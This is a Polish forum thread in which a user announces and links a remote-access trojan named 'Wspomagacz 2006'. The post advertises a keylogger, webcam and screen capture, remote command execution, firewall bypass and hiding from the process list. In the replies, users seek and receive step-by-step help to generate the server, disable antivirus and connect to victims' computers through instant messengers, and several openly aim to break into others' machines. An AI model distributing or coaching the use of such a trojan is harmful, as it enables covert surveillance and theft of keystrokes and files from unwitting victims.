Wspomagacz 2006 Build: 39 BETA

wspomagacz

Użytkownik
Dołączył
Maj 8, 2004
Posty
48
Wspomagacz 2006 Build: 39 BETA


Witam wszystkich.

Miło mi jest zakomunikować, iż po bardzo długiej przerwie spowodowanej lenistwem udało mi się w końcu coś napisać. Mianowicie poprawiłem Wspomagacza. Nie wiem czy komuś się jeszcze przyda, ale mam nadzieje, że może się ktoś ucieszy.
Serwer napisany w asemblerze cała paczka (instalator + serwer + wtyczka standard) zajmuje 14 KB.


Możliwości:

- posiada wbudowany binder
- CMD
- screen p2p i NAT<>NAT
- obraz z kamery p2p i NAT<>NAT
- opcja uninstall
- pełny dostęp do dysku
- keylogger
- wirtualny pulpit
- dzięki rozdzieleniu na instalator i serwer właściwy program stał się znacznie bezpieczniejszy
- posiada funkcję Firewall Bypassing (jest niewykrywalny dla Firewalli)
- jest niewidzialny na liście procesów
- posiada budowę modułową
- serwer nie obciąża procesora i zajmuje malutko pamięci
- możesz kontrolować kilka komputerów jednocześnie
- pełny multitasking (np. możesz ściągać i wysyłać pliki na wiele komputerów
w jednym czasie)
- napisany w asemblerze (mniejszy i szybszy niż inne trojany w Delphi czy C++)
- używa tylko jednego portu do komunikacji


Download: http://www.wspomagacz.yoyo.pl/W2006B39.zip


PS.: Nie wiem czemu ale mój ostatni post został zablokowany a później usunięty! Mam nadzieję, że już będzie dobrze.


Pozdrawiam.
 

Figli

Użytkownik
Dołączył
Czerwiec 18, 2006
Posty
57
Oki
<
k: Juz dziala =]
 

Spray

Użytkownik
Dołączył
Listopad 7, 2006
Posty
17
Witam. Jestem z lajta lama ale czy moglbys przyblizyc mi proces konfiguraci? Tak krok po kroku zebym sie domyclił. Z góry dziekuje.
 

Davvido

Użytkownik
Dołączył
Listopad 9, 2006
Posty
3
Mógłbyś wyjaśnić, co zrobić żeby mieć dostęp do innego kompa?

[ Dodano: 12-11-2006, 17:09 ]
Link już działa, ale trojan ( archiwum ) nie...
 

big_lamer

Użytkownik
Dołączył
Listopad 6, 2006
Posty
5
Witam
Może ktoś podrzuciłby jakiś FAQ lub kilka informacji jak to konfigurować by zadziałało, bo jak na razie to wszystkie stare linki nie działają (wspomagacz.net) a nowe jeszcze nie (wspomagacz.yoyo.pl)
Jeśli ktoś coś wie i miałby troszkę chęci do podzielenia się wiedzą to byłoby miło.
Pozdro for all.
 

TripleX

Użytkownik
Dołączył
Sierpień 10, 2006
Posty
715
No działa,tylko dlaczego jak wchodze w cmd to komp przeciwnika sie restartuje? I dlaczego po 20 minutach nagle zrywa połaczenie? (łącze sie przez GG)
 

big_lamer

Użytkownik
Dołączył
Listopad 6, 2006
Posty
5
Witam
Mam prośbę do kolegi TripleX (lub kogoś kto umie obsługiwać ten programik). Czy mógłbyś troszkę mniej obeznanym w temacie kolegom
<
podpowiedzieć, jak wykorzystać boskie możliwości tego prgramiku, bo ja próbuję wygenerować serwer i kilka razy to samo - błąd. Jeśli nie przez serwer to jak można za pomocą GG się tym bawić?
Moje GG 3398319
Pozdrawiam
 

TripleX

Użytkownik
Dołączył
Sierpień 10, 2006
Posty
715
Jaki niby błąd? Dajesz połaczenie nat>>nat wpisujesz numer serwera gg i jego hasło,poniżej numer klienta i generujesz.A jak sie serwer niegeneruje to spróbuj wyłączyć program antywirusowy.(Znam przypadki takich co mając program spakowany w ZIP próbowali generować serwer - Niewychodziła:))
 

big_lamer

Użytkownik
Dołączył
Listopad 6, 2006
Posty
5
Witam
Mam 2 numerki GG serwera i klienta. Stworzyłem "projekt" test na sobie przez opcję dodaj. Wchodzę w ten projekt poprzez podwójne kliknięcie, w prawym dolnym rogu jest połączenie NAT<>NAT. Wyświetla się na zielono DOSTĘPNY. Klikam połącz. W tym momencie na komunikatorze pojawia się komunikat : Nieznajomy przesyła wiadomość o treści : 110|i tu pojawia się hasło!!!!!. Niezależnie od wszystkiego gdy próbuję wygenerować serwer poprzez zakładkę "Generuj" to wyskakuje następujący komunikat:
Access violation at address 00509464 in module MASTER.EXE Read of address 00251ECC
Wszystkie AV są nieaktywne. I w żaden sposób nie można wygenerować serwera, którego rozumiem, że trzeba podrzucić ofierze, tak?
Gdybyś miał jakieś uwagi/spostrzeżenia co do tego, co źle robię to proszę o wskazówki.
Dzięki
 

big_lamer

Użytkownik
Dołączył
Listopad 6, 2006
Posty
5
W tzw. międzyczasie postawiłem na innym dysku czystego XP'ka i serwer się wygenerował i odpalił. Opisane cześniej problemy dotyczą W98SE. Udało mi się połączyć P2P. Co teraz mogę zrobić? Bo z tego co widzę to raczej niewiele. Działa Keylogger i ... chyba tylko tyle - obrazu, nie ma, dysków nie mogę przeglądać, komendy też się nie realizują. W zakładce cmd jest komenda np dir lub ftp, ale nic nie wychodzi. Czy tak ma być, czy znów gdzieś jest haczyk, którego muszę znaleźć?
Wielkie dzięki za wskazówki.
 

TripleX

Użytkownik
Dołączył
Sierpień 10, 2006
Posty
715
Trza było odrazu mówic że masz win98. Niektóre funkcje niedziałają tak samo przy p2p. Pozatym jak używasz tego na win98 to sie niedziwie że coś niedziała.To jest raczej pisane pod win xp.I tak jak mówie u mnie poza szczegółami działa wysmienicie
 

big_lamer

Użytkownik
Dołączył
Listopad 6, 2006
Posty
5
No proszę - jak się chce, to się wszystko uda
<
U mnie P2P działa OK, przegląda dyski, pobiera obraz z ekranu i kamerki też, jednak nie da się powiększyć ekranu z kamerki przez podwójne kliknięcie (tak jak to jest w przypadku zrzutu ekranu).
Mam pytanie, czy ktoś zna listę komend wykonywalnych przez moduł CMD i jaka jest ich składnia? Może ze starego FAQ, bo nie mogę go nigdzie zdobyć.
TripleX dzięki. Odezwij się proszę na podany wcześniej nr GG bo mam pewne spostrzeżenie, ale o tym nie na forum chciałbym.
Pozdrowionka dla wwszystkich walczących
<


[ Dodano: 17-11-2006, 01:02 ]
TripleX jeszcze jedno pytanko, bo pisałeś że łączysz się przez GG, a mnie coś to nie wychodzi. Działam teraz na XP, P2P działa. Wygenerowałem serwer z opcją połączeń P2P i NAT<>NAT. Numer X to numer serwera, numer Y to numer klienta. Gdy następuje próba połączenia, numer X (serwera) widnieje w prawym dolnym rogu a numer Y (klienta), gdy kliknie się w niebieską ikonkę GG (czwarta z lewej) problem w tym, że łączy i łączny i nic. Serwer jest odpalony na kompie u kumpla (zgodził się na testy). Czy trzeba na kompie, gdzie jest serwer odpalić komunikator z numerem serwka, czy to działający w tle plik serwera powinien się łączyć? Czy komunikat powinien widnieć na zielono "dostępny", czy tak jak w przypadku P2P "połączony" (na zielono). Dzięki za wskazówki
 

ACTION

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
2
mogli byscie podac aktywny link ze strona z ktorej mozna zciagnac to cudenko???
TripleX mam do ciebie sprawe moglbys w poscie napisac cos jakby instrukcje obslugi.Jestem poczatkujacy i nie mam pojecia o tych sprawach a chcialbym sie tym wlamywac przez gg albo tlena>>???

[ Dodano: 14-12-2006, 17:50 ]
??
 

sieniakx

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
6
ten link to jest do zwyklego wspomagacza 2006, a ten z tym najnowszym nie dziala :/ ma ktos moze jakis alternatywny link??
 
Do góry Bottom